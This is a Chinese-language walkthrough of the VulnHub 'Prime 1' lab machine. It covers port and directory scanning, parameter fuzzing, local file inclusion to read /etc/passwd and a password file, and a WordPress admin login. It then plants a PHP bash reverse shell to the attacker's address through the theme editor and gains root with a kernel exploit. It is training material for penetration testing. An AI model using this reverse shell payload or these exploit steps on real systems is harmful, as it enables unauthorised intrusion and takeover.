[vulnhub] Prime 1

news2024/11/17 4:23:20

https://www.vulnhub.com/entry/prime-1,358/

主机发现端口扫描

  1. 探测存活主机,137是靶机

    nmap -sP 192.168.75.0/24 
    //                       
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 16:25 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00028s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00026s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.137
    Host is up (0.0010s latency).
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    
  2. 扫描靶机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.137        
    //                   
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:54 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.0014s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    
  3. 扫描服务版本及系统版本

    nmap -sT -sV -O -p22,80 192.168.75.137           
    //                     
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00045s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    
  4. udp扫描

    nmap -sU 192.168.75.137  
    //                       
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00073s latency).
    Not shown: 997 closed udp ports (port-unreach)
    PORT     STATE         SERVICE
    68/udp   open|filtered dhcpc
    631/udp  open|filtered ipp
    5353/udp open|filtered zeroconf
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    
  5. 扫描漏洞

    nmap -script=vuln -p 22,80, 192.168.75.137       
    //
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /wordpress/: Blog
    |_  /wordpress/wp-login.php: Wordpress login page.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    

    扫描出 slowloris DOS用不上,以及cve2017-1001000 ,并且扫出存在wordpress 版本是<4.7.2的,因为能扫描出cve2017-1001000

  6. Nikto漏洞扫描

    nikto -host 192.168.75.137 -port 22,80
    //
    - Nikto v2.5.0
    ---------------------------------------------------------------------------
    ---------------------------------------------------------------------------
    + Target IP:          192.168.75.137
    + Target Hostname:    192.168.75.137
    + Target Port:        80
    + Start Time:         2024-09-22 18:44:45 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozill.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render th content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/wb-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is th EOL for the 2.x branch.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/                                                                           
    + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.                                                
    + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.           
    + /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.       
    + /wordpress/: Drupal Link header found with value: <http://192.168.75.137/wordpress/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/                          
    + /wordpress/: A Wordpress installation was found.
    + /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    + /wordpress/wp-content/uploads/: Directory indexing found.
    + /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
    + /wordpress/wp-login.php: Wordpress login found.
    + 8106 requests: 0 error(s) and 14 item(s) reported on remote host
    + End Time:           2024-09-22 18:45:09 (GMT8) (24 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    

web渗透

  1. 爆破目录,192.168.75.137

    [18:49:23] 200 -  131B  - /dev
    [18:49:25] 200 -  137B  - /image.php
    [18:49:26] 301 -  321B  - /javascript  ->  http://192.168.75.137/javascript/
    [18:49:32] 403 -  279B  - /server-status/
    [18:49:32] 403 -  279B  - /server-status
    [18:49:36] 200 -    1KB - /wordpress/wp-login.php
    [18:49:36] 200 -    4KB - /wordpress/
    

    查看/dev ,因为它不是一个正常该有的目录

    hello,
    
    now you are at level 0 stage.
    
    In real life pentesting we should use our tools to dig on a web very hard.
    
    Happy hacking. 
    

    意思是让我们更努力的去爆破目录?

  2. python .\dirsearch.py -u http://192.168.75.137/ --suffixes .txt,.zip 给字典加上.txt,.zip 后缀去爆破

    http://192.168.75.137/secret.txt
    

    查看内容得出

    Looks like you have got some secrets.
    
    Ok I just want to do some help to you. 
    
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck 
    Learn from here a basic tool with good usage for OSCP.
    
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
    
    //see the location.txt and you will get your next move//
    

    让我们进行fuzz爆破,大概意思是让我们在所有php文件进行fuzz ,大概就是让我们fuzzget参数

  3. 扫描出所有php文件

    irb http://192.168.75.137 -X .php               
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Sun Sep 22 20:12:05 2024
    URL_BASE: http://192.168.75.137/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.75.137/ ----
    + http://192.168.75.137/image.php (CODE:200|SIZE:147)                                                                                      
    + http://192.168.75.137/index.php (CODE:200|SIZE:136)                                                                                      
                                                                                                                                               
    -----------------
    END_TIME: Sun Sep 22 20:12:08 2024
    DOWNLOADED: 4612 - FOUND: 2
    

    当前目录下只有两个php文件我们两个都试试

  4. index.php进行fuzz

    注意 --hh 136 需要对视情况进行调整,过滤掉其他结果后,最后得出file这个参数

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.75.137/index.php?FUZZ=something
    //hh 过滤掉了 字长为136的数据
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.137/index.php?FUZZ=something
    Total requests: 951
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload                       
    =====================================================================
    
    000000341:   200        7 L      19 W       206 Ch      "file"                        
    
    Total time: 1.060608
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 896.6547
    
    
  5. 访问http://192.168.75.137/index.php?file=

    提示:Do something better you are digging wrong file
    

    可能file的参数也需要我们进行fuzz,其实这事burp也可以做

    但是之前的secret.txt还有一句 : //see the location.txt and you will get your next move//

    所以我们访问 :http://192.168.75.137/index.php?file=location.txt

    果然存在有信息

    Now dig some more for next one
    use 'secrettier360' parameter on some other php page for more fun. 
    

    让我们使用secrettier360 参数去别的php页面fuzz ,大概是

    别的php页面除了index.php那就是image.php

  6. image.php 进行fuzz

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 197 http://192.168.75.137/image.php?secrettier360=FUZZ
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.137/image.php?secrettier360=FUZZ
    Total requests: 951
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload                       
    =====================================================================
    
    000000257:   200        13 L     43 W       328 Ch      "dev"                         
    
    Total time: 1.031432
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 922.0189
    

    得出参数dev ,尝试访问:http://192.168.75.137/image.php?secrettier360=dev

    finaly you got the right parameter
    
    hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking. 
    

    WTF?这不是之前的/dev吗,但是发现你只要在secrettier360 加上文件名,那不就是文件包含了吗?我这里大发奇想使用php伪协议尝试,但是发现使用不了,应该是禁用了

  7. 利用文件包含漏洞

    尝试读取/etc/passwd

    http://192.168.75.137/image.php?secrettier360=../../../etc/passwd
    //
    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
    bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin 
    sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin 
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false 
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false 
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false 
    syslog:x:104:108::/home/syslog:/bin/false 
    _apt:x:105:65534::/nonexistent:/bin/false 
    messagebus:x:106:110::/var/run/dbus:/bin/false 
    uuidd:x:107:111::/run/uuidd:/bin/false 
    lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false 
    whoopsie:x:109:117::/nonexistent:/bin/false 
    avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false 
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false 
    dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false 
    colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false 
    speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false 
    hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
    kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false 
    pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false 
    rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false 
    saned:x:119:127::/var/lib/saned:/bin/false 
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false 
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash 
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false 
    saket:x:1001:1001:find password.txt file in my directory:/home/saket: 
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin 
    

    发现saket:x:1001:1001:find password.txt file in my directory:/home/saket: ,好好好

    http://192.168.75.137/image.php?secrettier360=../../../home/saket/password.txt
    //
    finaly you got the right parameter
    
    follow_the_ippsec 
    

    密码应该是follow_the_ippsec

  8. 登录wordpress后台,用户名victor,密码follow_the_ippsec

    为什么用户名是victor ,因为wordpress/index.php里面第一条信息就是victor 发布的,所以猜测用户名是victor ,成功进入后台

后台利用获得初级shell

  1. 进入后台,pluginsAdd Newupload plugins ,上传反弹shell文件

在这里插入图片描述

发现没有上传权限,即使设置关闭了以月份创建文件夹
  1. 寻找别的地方上传shellcode

    AppearanceTheme Editorsecret.php 找到了可编辑保存的文件

    我们将shellcode输进去

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.75.131/1234 0>&1'");?>
    

    然后save

  2. kali开启监听,并且访问

    http://192.168.75.137/wordpress/wp-content/themes/twentynineteen/secret.php
    
    nc -lvp 1234                          
    listening on [any] 1234 ...
    192.168.75.137: inverse host lookup failed: Unknown host
    connect to [192.168.75.131] from (UNKNOWN) [192.168.75.137] 42312
    bash: cannot set terminal process group (48712): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ 
    

    获得初级shell

提权

  1. 查看权限

    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l                    
    Matching Defaults entries for www-data on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User www-data may run the following commands on ubuntu:
        (root) NOPASSWD: /home/saket/enc
    //
    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a              
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    

    www-data 用户被授予了在 Ubuntu 系统上以 root 权限运行 /home/saket/enc 命令,而无需输入密码

    /home/saket/enc:这是一个具体的可执行文件或脚本的路径,www-data 用户可以以 root 身份执行它

    但是enc发现执行时还是需要输入密码,尝试利用别的

  2. 尝试内核漏洞

    searchsploit linux kernel 4.10.0-28 | grep 'Local Privilege'
    Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                 | solaris/local/15962.c
    Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                         | linux/local/50135.c
    Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                           | linux/local/47163.c
    Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                | linux/local/41886.c
    Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                         | linux/local/45553.c
    Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                             | linux/local/45010.c
    

    尝试最后一个 45010.c 然后把45010.c传到靶机,编译运行,记得给执行权限

    gcc 45010.c -o 45010
    chmod u+x 45010
    ./45010
    
    www-data@ubuntu:/tmp$ ./45010
    //
    uname -a
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    //
    whoami 
    root
    

    提权成功,读取flag文件

    python -c "import pty;pty.spawn('/bin/bash')"    
    //
    root@ubuntu:/tmp# cd /root
    root@ubuntu:/root# ls
    enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
    //
    root@ubuntu:/root# cat key.txt
    
    I know you are the fan of ippsec.
    
    So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2159747.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Rust - 字符串:str 与 String

在其他语言中&#xff0c;字符串通常都会比较简单&#xff0c;例如 “hello, world” 就是字符串章节的几乎全部内容了。 但是Rust中的字符串与其他语言有所不同&#xff0c;若带着其他语言的习惯来学习Rust字符串&#xff0c;将会波折不断。 所以最好先忘记脑中已有的关于字…

MMD模型一键完美导入UE5-VRM4U插件方案(一)

1、下载pmx模型 1、去模之屋官网下载MMD模型,模之屋 2、下载完成得到pmx和Texture文件 2、下载并启用VRM4U插件 1、下载VRM4U插件, VRM4U,点击Latest下载对应引擎版本 2、将插件放到Plugins目录,然后

GB28181语音对讲协议详解

GB28181-2016语音对讲流程如下图1所示&#xff1a; 图1.语音对讲流程。 其中, 信令 1 、2 、 3 、 4 为语音广播通知、 语音广播应答消息流程; 信令 5 、 1 2 、 1 3 、 1 4 、 1 5 、 1 6 为 S I P 服务器接收到客户端的呼叫请求通过 B 2 B UA 代理方式建立语音流接收者与媒…

DevExpress WPF中文教程:如何解决行焦点、选择的常见问题?

DevExpress WPF拥有120个控件和库&#xff0c;将帮助您交付满足甚至超出企业需求的高性能业务应用程序。通过DevExpress WPF能创建有着强大互动功能的XAML基础应用程序&#xff0c;这些应用程序专注于当代客户的需求和构建未来新一代支持触摸的解决方案。 无论是Office办公软件…

【HarmonyOS】应用权限原理和封装

背景 在项目中&#xff0c;避免不了需要调用系统资源和系统能力&#xff0c;比如&#xff1a;日历读写、摄像头等。因此&#xff0c;需要了解对系统资源访问权限的申请方式方法。 授权方式 包括两种授权方式&#xff0c;分别是system_grant(系统授权) 和 user_grant(用户授权)…

ruoyi源码解析学习 - 微服务版 - ruoyi-gateway

com.ruoyi.gateway 今天简单看看若依的gateway的配置模块干了啥 最近面试很多外包公司&#xff0c;都对低代码平台有点要求&#xff0c;这些代码虽说用起来不费劲&#xff0c;但是其中还是有很多细节能让我学习学习的。&#xff08;微服务版&#xff0c;上次搞jeecgboot的笔试…

R包安装教程,如何安装rjags和infercnv

一.介绍 在数据分析过程中&#xff0c;R语言因其强大的统计分析能力和丰富的包生态系统&#xff0c;成为众多研究人员和数据科学家的首选工具。本文将详细介绍如何在R环境中安装两个重要的R包——rjags和infercnv。rjags用于与JAGS&#xff08;Just Another Gibbs Sampler&…

热斑黄斑光伏发电板 红外黄斑检测图像数据集内含最高温度信息 1200张,jpg格式。

热斑黄斑光伏发电板 红外黄斑检测图像数据集 内含最高温度信息 1200张&#xff0c;jpg格式。 热斑黄斑光伏发电板红外黄斑检测图像数据集介绍 数据集名称 热斑黄斑光伏发电板红外黄斑检测图像数据集&#xff08;Hot Spot and Yellow Spot Detection in Photovoltaic Panels I…

Linux下进程通信与FIFO操作详解

Linux下进程通信与FIFO操作详解 一、命名管道(FIFO)概述1.1 命名管道的特点1.2 创建命名管道二、命名管道的操作2.1 打开命名管道2.2 读写命名管道2.3 关闭命名管道三、命名管道的使用实例3.1 命名管道的创建和通信过程3.1.1 发送方(writer)3.1.2 接收方(reader)3.2 运行…

java项目之健身房管理系统源码(springboot)

风定落花生&#xff0c;歌声逐流水&#xff0c;大家好我是风歌&#xff0c;混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的健身房管理系统。项目源码以及部署相关请联系风歌&#xff0c;文末附上联系信息 。 项目简介&#xff1a; 健身房管理系统的主要使用…

Java框架学习(Spring)(tx)(03)

简介&#xff1a;以本片记录在尚硅谷学习ssm-spring-tx时遇到的小知识 详情移步&#xff1a;想参考的朋友建议全部打开相互配合学习&#xff01; 视频&#xff1a; 057-spring-tx-编程式和声明式事务理解_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1AP411s7D7?p5…

第九节 Opencv自带颜色表操作

知识点&#xff1a;Look Up lTable&#xff08;LUT&#xff09;查找表 了解LUT查找表的作用与用法&#xff0c;代码实现与API介绍 -applyColorMap&#xff08;src,dst,COLORMAP&#xff09; -src表示输入图像 -dst表示输出图像 匹配到的颜色LUT&#xff0c;Opencv支持13种…

Android OpenGLES2.0开发(一):艰难的开始

生而为人&#xff0c;本质上&#xff0c;都是孤独的&#xff01; 引言 我一直觉得OpenGL ES是一块硬骨头&#xff0c;每次用到GLSurfaceView作为Camera的预览视图时&#xff0c;总是去网上找现成的代码。CtrlC和CtrlV之后总有一种沾沾自喜的感觉&#xff0c;但是你要让我改里面…

JavaScript --- 字符串常用方法(1)

chartAt(索引)&#xff0c;返回索引对应字符 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport" …

Java | Leetcode Java题解之第433题最小基因变化

题目&#xff1a; 题解&#xff1a; class Solution {public int minMutation(String start, String end, String[] bank) {int m start.length();int n bank.length;List<Integer>[] adj new List[n];for (int i 0; i < n; i) {adj[i] new ArrayList<Intege…

chsharp文件如何查找在unity中使用的 位置?

在 Unity 中&#xff0c;C 脚本文件&#xff08;.cs 文件&#xff09;被用于控制游戏对象的行为。要查找某个 C 文件在 Unity 项目中被使用的位置&#xff0c;你可以通过以下几种方法&#xff1a; 1. 查找依赖项&#xff08;References&#xff09; Unity 提供了一个工具&#…

物联网助力智慧交通:优势与前景

智慧交通是当今城市发展的必然趋势&#xff0c;而物联网技术在交通运输领域的应用正是为实现智慧交通建设提供了前所未有的机遇和优势。物联网作为连接和控制物理世界的重要技术手段&#xff0c;在交通领域的应用极大地改善了交通系统的效率、安全性和环保性。 首先&#xff0c…

LabVIEW软件出现Bug如何解决

在LabVIEW开发中&#xff0c;程序出现bug是不可避免的。无论是小型项目还是复杂系统&#xff0c;调试与修复bug都是开发过程中的重要环节。下文介绍如何有效解决LabVIEW软件中的bug&#xff0c;包括常见错误类型、调试工具、错误处理机制。 1. 常见Bug类型分析 在LabVIEW中&am…

使用vite+react+ts+Ant Design开发后台管理项目(二)

前言 本文将引导开发者从零基础开始&#xff0c;运用、react、react-router、react-redux、Ant Design、less、tailwindcss、axios等前沿技术栈&#xff0c;构建一个高效、响应式的后台管理系统。通过详细的步骤和实践指导&#xff0c;文章旨在为开发者揭示如何利用这些技术工具…

C语言 | Leetcode C语言题解之第429题N叉树的层序遍历

题目&#xff1a; 题解&#xff1a; #define MAX_LEVE_SIZE 1000 #define MAX_NODE_SIZE 10000int** levelOrder(struct Node* root, int* returnSize, int** returnColumnSizes) {int ** ans (int **)malloc(sizeof(int *) * MAX_LEVE_SIZE);*returnColumnSizes (int *)mal…